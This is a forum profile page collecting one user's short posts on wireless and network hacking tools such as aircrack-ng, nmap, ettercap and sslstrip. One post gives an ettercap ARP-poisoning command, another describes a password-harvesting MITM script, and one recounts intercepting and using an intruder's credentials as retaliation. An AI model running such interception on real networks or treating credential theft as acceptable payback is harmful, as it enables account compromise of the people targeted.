Jump to content

aeiah

Active Members
  • Posts

    48
  • Joined

  • Last visited

Everything posted by aeiah

  1. thanks for that. curiously, ive got nmap v5.00 too, so i assume you were getting errors because of what the gateway was reporting. ive updated my script (located at the same location) with your amendments. hopefully this script will now be a bit more robust.
  2. god damnit, i made one too around the same time but posted it a few weeks after, hehe http://www.hak5.org/forums/index.php?showtopic=16158 my ettercap command is rather standard, just ettercap -T -i interface -q -M arp:remote /gateway/ /target/ do you know off the top of your head if that command monitors all ports by default? you've specified a lot in your script so i guess mine only monitors port 80. ill have to look into it
  3. see what it identifies its self as, run lsusb if it's usb. clearwave may not be the guys that do the chipset and finding out what this card truly is may yield better results
  4. thanks for the description of your changes. grabbing nmap output was bound to be a bit funky over different versions. ill look into making it more bullet proof in the coming days. by the sounds of things using -oG might simplify things. im not a regular user of nmap. do you fancy posting your modified script here or on my blog?
  5. you could try another method i suppose. i just install backtrack like any other operating system rather than mess with usb sticks. almost all linux distributions will have aircrack and whatnot in their repos so you could probably just go down that route.. slitaz, crunchbang, slax, and sidux are fairly small distros with decent live functionality. in fact, i think the custom slitaz livecd that aircrack provide on their site will work out of the box with your card. i get the impression since you've yet to master google that you may have problems with a lot of linux distributions and tutorials though
  6. aeiah

    Pineapple

    they now use openmesh routers instead of fon, no? i don't think there's a risk of them permanently running out of stock for a while as these are still produced and a number of places stock them.
  7. i think its biggest asset in the opensource community is to give you the ability to use other's code and build upon or contribute to existing projects. its true that small utilities and things you do just by yourself rarely need to be object oriented. i suggested ruby because of metasploit. in truth i think python is far more useful
  8. well it got covered in the recent episode of hak 5 (#0709) so i expect a lot will have heard of it. there was brief discussion prior to the episode airing i think. it seems pretty interesting, but the one sticking point is the lack of network connectivity. i hear there is a mini-sd wifi card you can use? i think i speak for a lot of us when i say it'd be great to have support for a wifi card that can do packet injection, monitor mode, master mode etc
  9. aeiah

    Antenna Advice

    your best bet is to solder a proper socket on. something like this providing your antenna is RP-SMA (the standard now). snip the end off and solder the sheath and inner cable to your circuit the same way as it is on your non-removable antenna.
  10. its a usb-host port, not client. you could hack the nokia tablets to switch from host to client, perhaps this can do the same but i wouldn't hold your breath.
  11. html and related things are markup languages not programming languages. its more relevant to learn programming theory and object oriented programming than just learning the syntax of a new language. if you want to contribute to open source software, ruby and python are probably two useful languages to know
  12. so when the law gets involved because some script-kiddie has done something silly, hak5 will get negative press? just use the tools available if they're up to scratch, or add new features to the best one if its lacking in some area.
  13. just set cron to do apt-get update && apt-get upgrade?
  14. since backtrack is already based on ubuntu, why dont you create some packages for whatever drivers you're missing instead of reinventing the wheel? if you're wanting this to be a live cd / usb, then perhaps it'll be simpler to repackage backtrack with the included drivers rather than package ubuntu with all the software backtrack uses.
  15. i think it goes without saying that you should spit out some WPA-PSK rainbow tables for Sky broadband. SSID: SKYxxxxx where xxxxx are 5 random digits. 3-2-1-GO!
  16. $50-$100? srsly? im a little skeptical of this coming to fruition for such a cost. i assume no one needs to tell you that an atheros card capable of packet injection is a must ;) are you using Maemo / Moblin / MeeGo or rolling your own distro?
  17. its saying "standard error output received a message from tftp" (the transfer protocol used). its stuck in a repetition loop, im guessing because its lost communication? have you tried just using plain old tftp with a serial terminal? i used minicom myself
  18. so yes, insofar as using airdrop-ng (or, since it isn't really available yet, we'll say aireplay-ng) with packet capturing applications other than aircrack-ng: well if you're deauthenticating people to grab a handshake when they reauthenticate then you can use kismet i guess, and then use cowpatty for WPA or something else for WEP but i like to keep everything within the aircrack-ng suite for simplicity and compatibility. It seems cain and abel can do packet injection and WEP cracking, but really why bother? WEP cracking takes about 3 minutes with an automated script using the aircrack-ng suite. As for deauthenticating for other reasons, there's nothing stopping you using any other software but it really depends on what you're doing. The only other reason i can think of that you'd want to deauthenticate someone if you weren't wanting to crack WEP or WPA is so they accidentally authenticate with yourself instead (a la Jasager, Karmetasploit etc). aireplay-ng (in this context) and airdrop-ng just do one thing: deauthenticate clients from access points. they dont gather any info or send anything out. what happens next and with what tools is up to the user to decide.
  19. only one i end up using in windows is alt+ctrl+delete+DELETE+DELETE+DELETE+DELETE+DELETE
  20. my blog post regarding it the actual script depends on: linux iptables nat nmap ettercap (with iptables enabled in etter.conf) sslstrip it just gives you a list of available targets on your lan, sets things up and leaves you with ettercap for when passwords start showing up. let me know how you get on if anyone decides to use it. its not coded very beautifully but it works for me and ill try and get it working for others too.
  21. it doesn't do any capturing. aireplay doesnt do any capturing either, it just sends out deauthentication requests. what is it you're envisaging? it may already exist somewhere
  22. get a decent router and set up some firewall rules. just block anything that isnt port 80 and 443 that's from a MAC that isnt yours. if he's crafty enough to clone your MAC then arp poison and sslstrip him and get his passwords, send him an email from his own email address and as soon as he checks it, disconnect him :P i did the latter to someone who hacked my WEP once. it was quite amusing to look at wireshark and see him frantically logging into things to change passwords, then i left him dangling by changing to WPA before he had a chance to change them all.
  23. i thought pcap was for packet capturing? all airdrop-ng does is send deauthentication messages to wireless access points. as far as i know its just a rather clever wrapper for aireplay-ng that lets you easily set up filter rules.
×
×
  • Create New...